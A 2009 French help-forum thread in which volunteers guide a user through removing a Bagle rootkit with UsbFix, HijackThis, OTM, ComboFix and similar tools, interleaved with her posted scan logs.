Bonsoir, Je viens de détecter un rootkit bagle avec Malwarebytes, ci joint le rapport de l'antivirus. J'ai essayé de m'en débarrasser à la racine, mais il est toujours présent. Je ne comprends pas bien tout ce que j'ai pu voir sur le forum et j'aurais besoin d'un peu d'aide Merci d'avance Malwarebytes' Anti-Malware 1.38 Version de la base de données: 2299 Windows 5.1.2600 Service Pack 2 25/06/2009 22:12:19 mbam-log-2009-06-25 (22-12-15).txt Type de recherche: Examen complet (C:\|F:\|) Eléments examinés: 149987 Temps écoulé: 44 minute(s), 15 second(s) Processus mémoire infecté(s): 0 Module(s) mémoire infecté(s): 0 Clé(s) du Registre infectée(s): 0 Valeur(s) du Registre infectée(s): 1 Elément(s) de données du Registre infecté(s): 0 Dossier(s) infecté(s): 0 Fichier(s) infecté(s): 0 Processus mémoire infecté(s): (Aucun élément nuisible détecté) Module(s) mémoire infecté(s): (Aucun élément nuisible détecté) Clé(s) du Registre infectée(s): (Aucun élément nuisible détecté) Valeur(s) du Registre infectée(s): HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\german.exe (Rootkit.Bagle) -> No action taken. Elément(s) de données du Registre infecté(s): (Aucun élément nuisible détecté) Dossier(s) infecté(s): (Aucun élément nuisible détecté) Fichier(s) infecté(s): (Aucun élément nuisible détecté)

slt merci chiki! que de boulot depuis le début d'usbfix..... alors avant le scan en ligne faire ceci: vire elibaga de ton ordinateur vire tes cracks puis Télécharge et installe UsbFix de C_XX & Chiquitine29 Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) susceptible d'avoir été infectées sans les ouvrir # Double clic sur le raccourci UsbFix présent sur ton bureau . # Choisis l'option 1 ( Recherche ) # Laisse travailler l'outil. # Ensuite post le rapport UsbFix.txt qui apparaitra. # Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque. ( C:\UsbFix.txt ) ( CTRL+A Pour tout sélectionner , CTRL+C pour copier et CTRL+V pour coller ) # Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus (AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool. Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus. Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...) d'où l'alerte émise par ces antivirus.

slt, reouvre malwaire bite et va dans la quarantaine et coches ton infection et fait suprimer la selection et ton problleme sera resolut

slt en français c'est mieux * Téléchargez ELIBAGLA en bas de cette page http://www.zonavirus.com/datos/descargas/95/elibagla.asp * Clique sur le bouton Descargar Elibagla cela va télécharger le fichier, placez le sur votre bureau. * Double-cliquez dessus pour l'ouvrir * Assurez-vous que dans le menu déroulant Unidad, vous avez bien C:\ * Vérifiquez aussi que l'option en bas de la fenêtre Eliminar Ficheros Automaticamente est bien cochée * Cliquez sur le bouton Explorar pour lancer l'analyse Si, dans le rapport,elibaga tu vois un texte semblable à celui-ci Por favor, envienos una muestra del fichero C:\Muestras\HLDRRR.EXE.Muestra EliBagle v10.24 a "virus@satinfo.es". Gracias; envoie ce(s) fichier(s) (dans l'exemple C:\Muestras\HLDRRR.EXE.Muestra EliBagle v10.24 ) à l'adresse e-mail indiquée (virus@satinfo.es). et ils mettront a jour elibaga dans les 48 heures ce qui permettra de virer le virus que tu as!!! ------------ colle le rapport d'un scan en ligne avec un des suivants: bitdefender en ligne : http://www.bitdefender.fr/scan_fr/scan8/ie.html Panda en ligne : http://pandasoftware.fr

Bonsoir, Merci d'intervenir accesso denegado a la carpeta, dois je dire ok? que veut dire cela? Et dois désactiver Antivir pour faire le scan?

oui désactive antivir puis lance elibaga

pour faire le scan en ligne tu cliques sur un des liens donnés en message 2

Salut jlpjlp bagle a été intégré a usbfix .... ;) http://www.commentcamarche.net/forum/affich 11859597 retour de usbfix?page=18#371

pour avancer mon ami jlpjlp ;) (!) Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) susceptible d avoir été infectés sans les ouvrir • Double clic sur le raccourci UsbFix présent sur ton bureau • choisis l'option 2 ( Suppression ) • Ton bureau disparaitra et le pc redémarrera . • Au redémarrage , UsbFix scannera ton pc , laisse travailler l'outil. • Ensuite post le rapport UsbFix.txt qui apparaitra avec le bureau . • Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque.( C:\UsbFix.txt ) ( CTRL+A Pour tout selectionner , CTRL+C pour copier et CTRL+V pour coller )

oki ▶ Télécharge random's system information tool (RSIT) et sauvegarde-le sur le Bureau. • Double-clique sur RSIT.exe afin de lancer RSIT. • Lis le contenu de l'écran Disclaimer puis clique sur Continue (si tu acceptes les conditions). • Si l'outil HijackThis (version à jour) n'est pas présent ou non détecté sur l'ordinateur, RSIT le téléchargera (autorise l'accès dans ton pare-feu, si demandé) et tu devras accepter la licence. • Lorsque l'analyse sera terminée, deux fichiers texte s'ouvriront. • Poste le contenu de log.txt .

va a ce fichier : C:\Program Files\trend micro\CLENET.exe double clic dessus c est hijackthis choisi do a syste san only coche cette ligne : O4 - HKCU\..\Run: [german.exe] C:\WINDOWS\system32\wintems.exe et clic sur fix checked ensuite : Purge de la restauration système *Désactive ta restauration : Clique droit sur poste de travail/propriétés/Restauration système/coche la case désactiver la restauration, appliquer, OK ---> Redémarre ton PC ... *Réactive ta restauration : Clique droit sur poste de travail/propriétés/Restauration système/décoche la case désactiver la restauration, appliquer, OK --->Redémarre ton PC ... ( Note : tu peux aussi y accéder via panneau de configuration->" système "->" restauration système " ). Tuto xp : http://service1.symantec.com/support/inter/tsgeninfointl.Nsf/fr_docid/20020830101856924 ensuite scan avec ton antivirus et post son rapport stp

Rootkit bagle

Réponse 21 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

Télécharge OTM
http://www.geekstogo.com/forum/files/file/402-otm-oldtimers-move-it/
http://oldtimer.geekstogo.com/OTMoveIt3.exe (de Old_Timer) sur ton Bureau.

double-clique sur OTM.exe pour le lancer.
copie la liste qui se trouve en citation ci-dessous,
et colle-la dans le cadre de gauche de OTM :Paste instruction for items to be moved.
(attention bien mettre :files)

:processes
explorer.exe
:files
C:\WINDOWS\system32\wintems.exe
:reg
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"german.exe"=-
:commands
[purity]
[emptytemp]
[start explorer]

clique sur MoveIt! pour lancer la suppression.
le résultat apparaitra dans le cadre "Results".
clique sur Exit pour fermer.
poste le rapport situé dans C:\_OTM\MovedFiles.

il te sera peut-être demander de redémarrer le pc pour achever la suppression.si c'est le cas accepte par Yes.

__________________

Mettre a jour java:
https://javara.fr.malavida.com/indows

Télécharge JavaRa.zip de Paul 'Prm753' McLain et Fred de Vries.
Décompresse le fichier sur ton bureau (clique droit > Extraire tout.)
Double-clique sur le répertoire JavaRa obtenu.
Puis double-clique sur le fichier JavaRa.exe (le .exe peut ne pas s'afficher)
Clique sur Search For Updates.
Sélectionne Update Using jucheck.exe puis clique sur Search.
Autorise le processus à se connecter s'il te le demande, clique sur Install et suis les instructions d'installation. Cela prendra quelques minutes.
Quand l'installation est terminée, revient à l'écran de JavaRa et clique sur Remove Older Versions.
Clique sur Oui pour confirmer. L'outil va travailler, clique ensuite sur Ok, puis une deuxième fois sur Ok.
Un rapport va s'ouvrir, copie-colle le dans ta prochaine réponse.
Note : le rapport se trouve aussi à la racine de la partition système, en général C:\ sous le nom JavaRa.log
(c:\JavaRa.log)
Ferme l'application.

si cela ne fonctionne pas

https://www.java.com/fr/download/windows_manual.jsp?locale=fr&host=www.java.com:80

tu peux désinstaller les vieilles versions.

______________

mets a jour adobe reader avec la version 9

______________

remets un rapport RSIT et surtout dis nous comment se comporte ton pc

a plus

happygirly Messages postés 102 Statut Membre

Bonsoir jlp,

Voici le log demandé, à la mise à jour de java, j'ai Avira qui m'a détecté: ADSPY/dowloaderNavipromo.B.30
Pfff!!! Que faire , je l'ai placé en quarantaine, mais je fais quoi du coup?

All processes killed
========== PROCESSES ==========
No active process named explorer.exe was found!
========== FILES ==========
File/Folder C:\WINDOWS\system32\wintems.exe not found.
========== REGISTRY ==========
Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run not found.
========== COMMANDS ==========

[EMPTYTEMP]

User: Administrateur
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->FireFox cache emptied: 2523998 bytes

User: All Users

User: CLENET
->Temp folder emptied: 1228917 bytes
->Temporary Internet Files folder emptied: 1966679 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 117158181 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes

User: Documents and Settings

User: LocalService
->Temp folder emptied: 0 bytes
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
->Temporary Internet Files folder emptied: 32902 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes

%systemdrive% .tmp files removed: 0 bytes
C:\WINDOWS\B6D5E63DEFF546169DB706D08F10B0C0.TMP folder deleted successfully.
C:\WINDOWS\msdownld.tmp folder deleted successfully.
%systemroot% .tmp files removed: 3465788 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
Windows Temp folder emptied: 271641 bytes

RecycleBin emptied: 0 bytes

Total Files Cleaned = 120,88 mb

OTM by OldTimer - Version 3.0.0.2 log created on 07012009_192933

Files moved on Reboot...

Registry entries deleted on Reboot...

Réponse 22 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

saute la mise à jour java et fais le reste on verra après

Réponse 23 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

mets a jour adobe reader avec la version 9

______________

remets un rapport RSIT et surtout dis nous comment se comporte ton pc

_______________

pour vérifier navipromo:

désactive antivir puis

Fais un clic droit sur ce lien : (IL-MAFIOSO)
http://perso.orange.fr/il.mafioso/Navifix/Navilog1.exe
Enregistrer la cible (du lien) sous... et enregistre-le sur ton bureau.
Ensuite double clique sur navilog1.exe pour lancer l'installation.
Une fois l'installation terminée, le fix s'exécutera automatiquement.
(Si ce n'est pas le cas, double-clique sur le raccourci Navilog1 présent sur le bureau).

Laisse-toi guider. Au menu principal, choisis 1 et valides.
(ne fais pas le choix 2,3 ou 4 sans notre avis/accord)

Patiente jusqu'au message :
*** Analyse Termine le ..... ***
Appuie sur une touche comme demandé, le blocnote va s'ouvrir.
Copie-colle l'intégralité dans une réponse. Referme le blocnote.
Le rapport est en outre sauvegardé à la racine du disque (fixnavi.txt)

happygirly Messages postés 102 Statut Membre

Bonjour,
Voici les deux logs demandés.

Logfile of random's system information tool 1.06 (written by random/random)
Run by CLENET at 2009-07-02 15:40:27
Microsoft Windows XP Professionnel Service Pack 2
System drive C: has 3 GB (17%) free of 20 GB
Total RAM: 703 MB (39% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:40:45, on 02/07/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\RunDll32.exe
C:\Program Files\Lexmark 2400 Series\lxcrmon.exe
C:\Program Files\Lexmark 2400 Series\ezprint.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\lxcrcoms.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\WINDOWS\system32\msiexec.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\CLENET\Bureau\RSIT.exe
C:\Program Files\trend micro\CLENET.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.bing.com/?cc=fr&toHttps=1&redig=D4322FEE7CF74A348CB9CE970F098EF5
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = ;localhost;<local>
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: Lexmark Barre d'outils - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Lexmark Barre d'outils - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll
O4 - HKLM\..\Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM\..\Run: [lxcrmon.exe] "C:\Program Files\Lexmark 2400 Series\lxcrmon.exe"
O4 - HKLM\..\Run: [EzPrint] "C:\Program Files\Lexmark 2400 Series\ezprint.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [LXCRCATS] rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\LXCRtime.dll,_RunDLLEntry@16
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKCU\..\Run: [DWQueuedReporting] "C:\PROGRA~1\FICHIE~1\MICROS~1\DW\dwtrig20.exe" -t
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe" -autorun
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [german.exe] C:\WINDOWS\system32\wintems.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - Startup: OpenOffice.org 3.0.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w3/pr01/resources/MSNPUpld.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/...
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{3404C9AD-EBFC-4296-9730-4861F1CE804D}: NameServer = 217.27.32.5,213.228.0.168
O23 - Service: Avira AntiVir Planificateur (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: lxcr_device - - C:\WINDOWS\system32\lxcrcoms.exe

Réponse 24 / 32

happygirly Messages postés 102 Statut Membre

Bonjour à tous,

J'ai posté hier les derniers rapports demandés afin d'éradiquer le virus qui a infecté mon PC, depuis le 25 juin date de mon premier message, deux personnes compétentes pour le virus que j'ai attrapé se sont relayées, la difficulté étant de les avoir régulièrement en ligne.
Mon problème persistant, je me demandais si d'autres personnes pouvaient prendre le relais, pendant leur absence.
NB: Le virus que j'ai eu auparavant date de juin 2008 et ne semble pas devoir être traité de la même façon, sinon je ne serais pas là, à alourdir les demandes journalières d'aides sur le forum.
Merci pour l'aide éventuelle de personne aussi compétente que Chiquitine et jlpjlp que j'ai des difficultés à avoir en continu.

Réponse 25 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

slt
effectivement en ce moement je suis moins dispo

pour voir:

1/ vire bien tous tes cracks

2/ passe ccleaner pour nettoyer les traces d'infections de ton ordi:
https://www.malekal.com/tutoriel-ccleaner/

3/Télécharge combofix (par sUBs) ici :

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

et enregistre le sur le bureau sous le nom de ccm avant de l'enregistrer surtout

déconnecte toi d'internet et ferme toutes tes applications.

désactive tes protections (antivirus, parefeu, garde en temps réel de l'antispyware)

double-clique sur combofix.exe et suis les instructions

à la fin, il va produire un rapport C:\ComboFix.txt

réactive ton parefeu, ton antivirus, la garde de ton antispyware

copie/colle le rapport C:\ComboFix.txt dans ta prochaine réponse.

Attention, n'utilise pas ta souris ni ton clavier (ni un autre système de pointage) pendant que le programme tourne. Cela pourrait figer l'ordi.

Tu as un tutoriel complet ici :

http://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix

4/ lance tool cleaner et colle le rapport:

http://www.commentcamarche.net/telecharger/telecharger 34055291 toolscleaner

5/ mets a jour malwarebyte antimalware, et colle un rapport avec et vire tout ce qui est trouvé

5/ dis si encore des soucis et si il y en a explique clairement tes problèmes actuels

Réponse 26 / 32

happygirly Messages postés 102 Statut Membre

Bonjour,

Combofix sur usb, quand je l'enregistre il vient d'office sur le bureau et ne souhaites pas être renommé CCm comme tu le demandes, ça modifie l'extention, alors comment faire?
Le lien tutoriel de combofix ne fonctionne plus, et pour ce qui est de la garde de mon antimalware, je le désactive comment?

Réponse 27 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

fais tout ce qui à été donné . Désactive le tea timer Le temps de toute la désinfection. Pour malwarebyte il indique que tu ne lui demande rien . Il faut virer tout ce qui est trouvé et colle le rapport de la suppression . Sinon quels soucis rencontre ton pc?

happygirly Messages postés 102 Statut Membre

Bonsoir,

Re log avec tea timer désactivé, merci jlpjlp

ComboFix 09-07-02.02 - CLENET 03/07/2009 19:02.3 - NTFSx86
Microsoft Windows XP Professionnel 5.1.2600.2.1252.33.1036.18.703.325 [GMT 2:00]
Lancé depuis: c:\documents and settings\CLENET\Bureau\ccm.exe
AV: AntiVir Desktop *On-access scanning disabled* (Updated) {AD166499-45F9-482A-A743-FDD3350758C7}
.

((((((((((((((((((((((((((((( Fichiers créés du 2009-06-03 au 2009-07-03 ))))))))))))))))))))))))))))))))))))
.

2009-07-01 00:32 . 2009-07-01 00:32 -------- d-----r- c:\documents and settings\LocalService\Favoris
2009-06-30 20:40 . 2009-06-30 20:40 -------- d-sh--w- c:\documents and settings\CLENET\IECompatCache
2009-06-29 21:09 . 2009-06-29 21:09 -------- d-sh--w- c:\documents and settings\LocalService\IETldCache
2009-06-29 20:13 . 2009-03-30 08:32 96104 ----a-w- c:\windows\system32\drivers\avipbb.sys
2009-06-29 20:13 . 2009-02-13 10:28 22360 ----a-w- c:\windows\system32\drivers\avgntmgr.sys
2009-06-29 20:13 . 2009-02-13 10:17 45416 ----a-w- c:\windows\system32\drivers\avgntdd.sys
2009-06-29 20:13 . 2009-06-29 20:13 -------- d-----w- c:\program files\Avira
2009-06-29 20:13 . 2009-06-29 20:13 -------- d-----w- c:\documents and settings\All Users\Application Data\Avira
2009-06-29 13:42 . 2009-07-03 12:11 -------- d-----w- c:\program files\trend micro
2009-06-29 13:24 . 2008-06-01 13:43 70656 -c--a-w- c:\windows\system32\dllcache\sysinfo.exe.REN
2009-06-29 13:24 . 2008-06-01 13:42 15360 -c--a-w- c:\windows\system32\dllcache\register.exe.REN
2009-06-29 08:55 . 2009-07-03 11:23 -------- d-----w- c:\program files\Panda Security
2009-06-28 21:01 . 2007-01-18 12:00 3968 ----a-w- c:\windows\system32\drivers\AvgArCln.sys
2009-06-28 20:53 . 2009-06-28 20:53 54624 ----a-w- c:\windows\system32\46028.sys
2009-06-15 17:59 . 2009-06-15 17:59 -------- d-sh--w- c:\documents and settings\CLENET\PrivacIE
2009-06-15 06:47 . 2009-06-15 06:47 -------- d-sh--w- c:\documents and settings\CLENET\IETldCache
2009-06-15 06:42 . 2009-03-24 12:43 43008 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\components\metricsloader.dll
2009-06-15 06:42 . 2009-03-24 12:43 43008 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\components\googletoolbarloader.dll
2009-06-15 06:42 . 2009-03-24 12:43 235520 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\metrics-ff2.dll
2009-06-15 06:42 . 2009-03-24 12:43 338432 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\googletoolbar-ff2.dll
2009-06-15 06:42 . 2009-03-24 12:42 235008 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\metrics-ff3.dll
2009-06-15 06:42 . 2009-03-24 12:42 345088 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\googletoolbar-ff3.dll
2009-06-15 04:55 . 2009-06-15 04:55 47338 ----a-w- c:\documents and settings\CLENET\temps11.vbs
2009-06-15 03:05 . 2009-06-15 03:05 -------- d-----w- c:\windows\ie8updates
2009-06-15 02:57 . 2009-06-15 03:03 -------- dc-h--w- c:\windows\ie8
2009-06-15 02:57 . 2009-06-15 03:02 -------- d-----w- c:\windows\system32\fr-FR
2009-06-15 02:44 . 2009-04-30 21:16 12800 -c----w- c:\windows\system32\dllcache\xpshims.dll
2009-06-15 02:44 . 2009-04-30 21:16 246272 -c----w- c:\windows\system32\dllcache\ieproxy.dll
2009-06-15 02:44 . 2009-04-30 21:16 1985024 -c----w- c:\windows\system32\dllcache\iertutil.dll
2009-06-15 02:43 . 2009-04-30 21:16 11064832 -c----w- c:\windows\system32\dllcache\ieframe.dll
2009-06-15 02:31 . 2009-05-12 05:11 102912 -c----w- c:\windows\system32\dllcache\iecompat.dll
2009-06-15 02:08 . 2009-06-15 02:08 -------- d-----w- c:\documents and settings\All Users\Application Data\McAfee
2009-06-15 02:07 . 2009-06-15 02:07 152576 ----a-w- c:\documents and settings\CLENET\Application Data\Sun\Java\jre1.6.0_14\lzma.dll
2009-06-14 13:11 . 2009-06-14 13:11 -------- d-----w- c:\program files\MSN Messenger
2009-06-14 12:30 . 2001-11-13 15:46 69632 ----a-r- c:\windows\system32\LVUI2RC.dll
2009-06-14 12:30 . 2001-11-13 15:46 200704 ----a-r- c:\windows\system32\LVUI2.dll
2009-06-14 12:30 . 2001-11-13 15:43 57344 ----a-r- c:\windows\system32\LVComC.dll
2009-06-14 12:30 . 2001-11-13 15:45 172032 ----a-r- c:\windows\system32\lvcodec2.dll
2009-06-14 12:30 . 2001-11-13 15:45 53248 ----a-r- c:\windows\system32\LVFWWDMT.dll
2009-06-14 12:30 . 2001-11-13 15:43 98304 ----a-r- c:\windows\system32\LVComS.exe
2009-06-14 12:30 . 2001-11-13 15:41 38912 ----a-r- c:\windows\system32\drivers\lvcd.sys
2009-06-14 12:30 . 2001-11-13 15:39 412672 ----a-r- c:\windows\system32\drivers\lvcodek2.dll
2009-06-14 12:30 . 2001-11-13 15:40 59904 ----a-r- c:\windows\system32\drivers\lvcam2.dll
2009-06-12 15:11 . 2009-06-12 15:11 -------- d-----w- c:\windows\system32\wbem\Repository
2009-06-09 01:18 . 2009-06-09 01:18 -------- d-----w- c:\program files\Fichiers communs\Labtec
2009-06-09 01:17 . 2009-06-14 13:02 -------- d-----w- c:\program files\Fichiers communs\LogiShrd
2009-06-06 22:19 . 2005-08-25 20:10 9804 ----a-w- c:\windows\system\vdremote.dll
2009-06-06 22:19 . 2005-08-25 20:09 7244 ----a-w- c:\windows\system\vdsvrlnk.dll
2009-06-06 22:19 . 2005-12-09 13:00 -------- d-----w- c:\program files\VirtualDub
2009-06-06 22:17 . 2009-06-06 22:17 -------- d-----w- c:\program files\XviD

.
(((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-07-03 16:53 . 2008-01-03 15:35 -------- d-----w- c:\documents and settings\CLENET\Application Data\FileZilla
2009-07-03 09:47 . 2008-05-20 08:40 -------- d-----w- c:\program files\Mozilla Thunderbird
2009-07-02 15:56 . 2009-02-09 12:51 1 ----a-w- c:\documents and settings\CLENET\Application Data\OpenOffice.org\3\user\uno_packages\cache\stamp.sys
2009-07-02 13:36 . 2008-02-13 14:20 -------- d-----w- c:\program files\Fichiers communs\Adobe
2009-06-30 12:34 . 2007-05-14 05:37 -------- d-----w- c:\program files\eMule
2009-06-30 11:18 . 2004-07-14 12:49 -------- d-----w- c:\documents and settings\CLENET\Application Data\dvdcss
2009-06-29 13:35 . 2001-08-28 12:00 73020 ----a-w- c:\windows\system32\perfc00C.dat
2009-06-29 13:35 . 2001-08-28 12:00 464474 ----a-w- c:\windows\system32\perfh00C.dat
2009-06-18 17:34 . 2009-02-16 09:13 -------- d-----w- c:\documents and settings\CLENET\Application Data\Spotify
2009-06-17 22:02 . 2008-06-01 12:45 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-06-17 22:02 . 2008-10-07 11:16 3561743 ----a-w- c:\documents and settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe
2009-06-17 09:27 . 2008-10-07 11:16 38160 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-06-17 09:27 . 2008-06-01 12:45 19096 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-06-15 02:35 . 2009-06-15 02:35 0 ----a-w- c:\documents and settings\CLENET\errorlog.tmp
2009-06-15 02:10 . 2009-05-31 01:13 410984 ----a-w- c:\windows\system32\deploytk.dll
2009-06-15 02:10 . 2008-06-01 21:52 -------- d-----w- c:\program files\Java
2009-06-10 15:23 . 2006-09-09 20:45 -------- d-----w- c:\documents and settings\All Users\Application Data\DVD Shrink
2009-06-09 01:38 . 2005-09-05 20:51 -------- d-----w- c:\program files\Fichiers communs\Real
